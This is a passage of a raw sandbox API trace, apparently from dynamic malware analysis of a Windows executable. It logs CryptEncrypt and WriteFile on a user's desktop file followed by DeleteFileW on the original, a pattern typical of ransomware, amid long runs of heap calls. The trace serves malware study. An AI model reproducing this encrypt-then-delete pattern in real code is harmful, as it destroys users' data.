dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0118.533] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x775e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x7760) returned 1 [0118.533] CharLowerBuffW (in: lpsz="byte[30561]", cchLength=0xb | out: lpsz="byte[30561]") returned 0xb [0118.534] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.534] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0118.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0118.534] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x452c648*, pdwDataLen=0x144e790*=0x775e, dwBufLen=0x7760 | out: pbData=0x452c648*, pdwDataLen=0x144e790*=0x7760) returned 1 [0118.534] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0118.534] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0118.534] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.538] WriteFile (in: hFile=0x258, lpBuffer=0x451d778*, nNumberOfBytesToWrite=0x7760, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x451d778*, lpNumberOfBytesWritten=0x144f194*=0x7760, lpOverlapped=0x0) returned 1 [0118.540] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0118.540] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.540] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0118.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43caa00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0118.540] CryptDestroyKey (hKey=0x41ac100) returned 1 [0118.540] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0118.540] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0118.540] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.540] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0118.540] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0118.540] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.540] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.540] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0118.540] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0118.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0118.540] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0118.540] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.541] FreeLibrary (hLibModule=0x756e0000) returned 1 [0118.541] CloseHandle (hObject=0x2a0) returned 1 [0118.541] CloseHandle (hObject=0x258) returned 1 [0118.561] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\2V N4wBRBU.mp3", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\2V N4wBRBU.mp3", lpFilePart=0x0) returned 0x26 [0118.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a2f0 [0118.561] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\2V N4wBRBU.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\2v n4wbrbu.mp3")) returned 0x20 [0118.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0118.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0118.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0118.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0118.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0118.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0118.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0118.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0118.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0118.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0118.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3f8 [0118.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392298 [0118.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0118.562] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\2V N4wBRBU.mp3", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31429790, ftCreationTime.dwHighDateTime=0x1d5ee80, ftLastAccessTime.dwLowDateTime=0x354fc030, ftLastAccessTime.dwHighDateTime=0x1d5e942, ftLastWriteTime.dwLowDateTime=0x354fc030, ftLastWriteTime.dwHighDateTime=0x1d5e942, nFileSizeHigh=0x0, nFileSizeLow=0x775e, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="2V N4wBRBU.mp3", cAlternateFileName="2VN4WB~1.MP3")) returned 0x41ac640 [0118.562] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\2V N4wBRBU.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\2v n4wbrbu.mp3")) returned 1 [0118.580] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31429790, ftCreationTime.dwHighDateTime=0x1d5ee80, ftLastAccessTime.dwLowDateTime=0x354fc030, ftLastAccessTime.dwHighDateTime=0x1d5e942, ftLastWriteTime.dwLowDateTime=0x354fc030, ftLastWriteTime.dwHighDateTime=0x1d5e942, nFileSizeHigh=0x0, nFileSizeLow=0x775e, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="2V N4wBRBU.mp3", cAlternateFileName="2VN4WB~1.MP3")) returned 0 [0118.580] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0118.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0118.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0118.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0118.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0118.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a2f0 | out: hHeap=0x1780000) returned 1 [0118.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0118.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0118.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0118.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0118.581] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0118.581] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0118.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0118.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0118.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0118.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0118.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0118.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0118.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0118.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0118.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7ba8 | out: hHeap=0x1780000) returned 1 [0118.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0118.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0118.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0118.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0118.581] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0118.582] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0118.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0118.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0118.582] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0118.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0118.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0118.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0118.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0118.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0118.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0118.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0118.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0118.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0118.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0118.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0118.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0118.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0118.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0118.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0118.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0118.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0118.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da070 [0118.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0118.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0118.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0118.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0118.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0118.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0118.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0118.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0118.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0118.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0118.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0118.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0118.583] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0118.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0118.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0118.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0118.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0118.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0118.583] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0118.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0118.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0118.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0118.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0118.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0118.583] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca667c00, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xca667c00, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0x2e3c7500, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x11ec00, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="42F0.TMP.EXE.exe", cAlternateFileName="42F0TM~1.EXE")) returned 0x41ac040 [0118.584] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0118.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0118.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0118.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0118.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0118.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0118.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0118.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0118.584] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0118.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0118.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0118.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0118.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0118.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0118.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0118.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0118.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0118.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0118.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d70 [0118.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0118.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0118.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0118.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0118.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0118.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0118.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0118.585] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0118.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392500 [0118.585] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0118.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392500 | out: hHeap=0x1780000) returned 1 [0118.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0118.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21f0 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0118.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0118.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0118.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e00 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0118.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0118.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0118.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0118.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 